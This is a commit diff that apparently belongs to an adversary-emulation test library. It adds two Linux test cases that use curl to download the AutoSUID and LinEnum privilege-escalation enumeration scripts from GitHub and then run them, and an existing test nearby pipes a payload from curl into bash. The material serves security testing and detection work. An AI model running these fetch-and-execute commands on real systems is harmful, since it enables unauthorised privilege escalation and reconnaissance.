Command and Scripting Interpreter: Bash - 2 new atomics (#1766)

* AutoSUID exeuction * updates to rpre reg * linenum tool * minor * uuid * remove uuid
2022-02-07 13:59:53 -08:00
parent ccb98851fe
commit 1d75fda8df
1 changed files with 56 additions and 1 deletions
@@ -23,7 +23,7 @@ atomic_tests:
      rm #{script_path}
    name: sh
 - name: Command-Line Interface
-  auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
+  auto_generated_guid: d0c81167-803d-4dca-99b4-7ce65e7b257c
  description: |
    Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

@@ -38,3 +38,58 @@ atomic_tests:
    cleanup_command: |
      rm /tmp/art-fish.txt
    name: sh
+- name: Harvest SUID executable files
+  description: |
+    AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 
+  supported_platforms:
+  - linux 
+  input_arguments:
+    autosuid:
+      description: Path to the autosuid shell script
+      type: Path
+      default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
+    autosuid_url:
+      description: Path to download autosuid shell script
+      type: Url
+      default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      AutoSUID must exist on disk at specified location (#{autosuid})
+    prereq_command: |
+      if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      curl #{autosuid_url} --output #{autosuid}
+  executor:
+    command: |
+      chmod +x #{autosuid}
+      bash #{autosuid}
+    name: sh
+
+- name: LinEnum tool execution
+  description: |
+    LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
+  supported_platforms:
+  - linux 
+  input_arguments:
+    linenum:
+      description: Path to the LinEnum shell script
+      type: Path
+      default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
+    linenum_url:
+      description: Path to download LinEnum shell script
+      type: Url
+      default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      LinnEnum must exist on disk at specified location (#{linenum})
+    prereq_command: |
+      if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      curl #{linenum_url} --output #{linenum}
+  executor:
+    command: |
+      chmod +x #{linenum}
+      bash #{linenum}
+    name: sh